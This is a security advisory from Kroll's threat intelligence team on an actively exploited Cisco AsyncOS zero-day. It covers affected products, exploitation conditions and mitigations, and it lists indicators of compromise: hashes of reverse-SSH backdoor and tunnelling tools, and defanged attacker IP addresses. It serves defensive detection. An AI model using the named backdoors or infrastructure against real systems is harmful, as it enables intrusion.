Cyber
December 19, 2025
Unpatched Cisco Critical Zero-Day Exploited by Chinese-Nexus Actors
This article was authored by Ryan Hicks of Kroll’s Threat Intelligence Team
Key Takeaways
- Cisco AsyncOS, Secure Email Gateway and Secure Email/Web Manager are impacted by a CVSS 10.0 flaw enabling root-level command execution.
- No patch is currently available, and systems are vulnerable if Spam Quarantine is internet exposed.
Summary
CVE: CVE-2025-20393
CVSS: 10 - CRITICAL
Exploitation Potential: Exploited in the wild
Action: Carry out mitigations (No patch available at time of writing)
Products Impacted:
- Cisco AsyncOS
- Cisco Secure Email Gateway (Physical and Virtual)
- Cisco Secure Email and Web Manager (Physical and Virtual)
Cisco has released an advisory on CVE-2025-20393, which carries a CVSS of 10.0 (Critical), that could lead to command execution as root privileges. The vulnerability has been exploited in the wild which has been described in a recent Cisco Talos report. Cisco assesses the actor to be a Chinese-nexus APT who exploited the vulnerability to deploy AQUASHELL (Python backdoor), AQUAPURGE (lightweight utility) and AQUATUNNEL (ReverseSSH backdoor). The open-source tunneling tool 'CHISEL' was also observed in use as a proxy. Cisco notes it has been aware of this activity since at least late November 2025.
Exploitation Requirements
Cisco notes that products are vulnerable only if the following conditions are met:
- The appliance is configured with the Spam Quarantine feature.
- The Spam Quarantine feature is exposed to and reachable from the internet.
Mitigations
At the time of writing, there is no patch available for the vulnerability, therefore it is imperative to ensure the Spam Quarantine is not exposed to the internet, or to disable entirely if it is not required.
Indicators of Compromise (IOCs)
The following IOCs are reported by Cisco and have been ingested into the Kroll IOC feed for managed service customer detection:
AquaTunnel
2db8ad6e0f43e93cc557fbda0271a436f9f2a478b1607073d4ee3d20a87ae7ef
AquaPurge
145424de9f7d5dd73b599328ada03aa6d6cdcee8d5fe0f7cb832297183dbe4ca
Chisel
85a0b22bd17f7f87566bd335349ef89e24a5a19f899825b4d178ce6240f58bfc
172[.]233[.]67[.]176
172[.]237[.]29[.]147
38[.]54[.]56[.]95
Recommended Actions
- Identify whether vulnerable products are in use (checking the exploitation requirements for each device).
- If organizations are running a vulnerable device, with conditions met, it is recommended to conduct a compromise assessment and hunt for the indicators of compromise detailed below.
- Seek further guidance as required from Cisco using the advisory links.
- Ensure vulnerable products are patched when this becomes available.
Get in touch with Kroll’s CTI Team for further frontline information and explore how our team can help you stay ahead of today’s threats.
Stay Ahead with Kroll
Cyber and Data Resilience
Kroll merges elite security and data risk expertise with frontline intelligence from thousands of incident responses and regulatory compliance, financial crime and due diligence engagements to make our clients more cyber- resilient.
Incident Response & Recovery
Kroll’s elite security leaders deliver rapid responses for over 3,000 incidents per year and have the resources and expertise to support the entire incident lifecycle, including litigation demands. Gain peace of mind in a crisis.
Cyber Threat Intelligence
Kroll's cyber threat intelligence services are fueled by frontline incident response intel and elite analysts to effectively hunt and respond to threats. Our team aligns Kroll’s technical intelligence, analytical research and investigative expertise to improve your visibility and provide expert triage, investigation and remediation services.
Threat Exposure Management
Kroll’s field-proven cyber security assessment and testing solutions help identify, evaluate and prioritize risks to people, data, operations and technologies worldwide.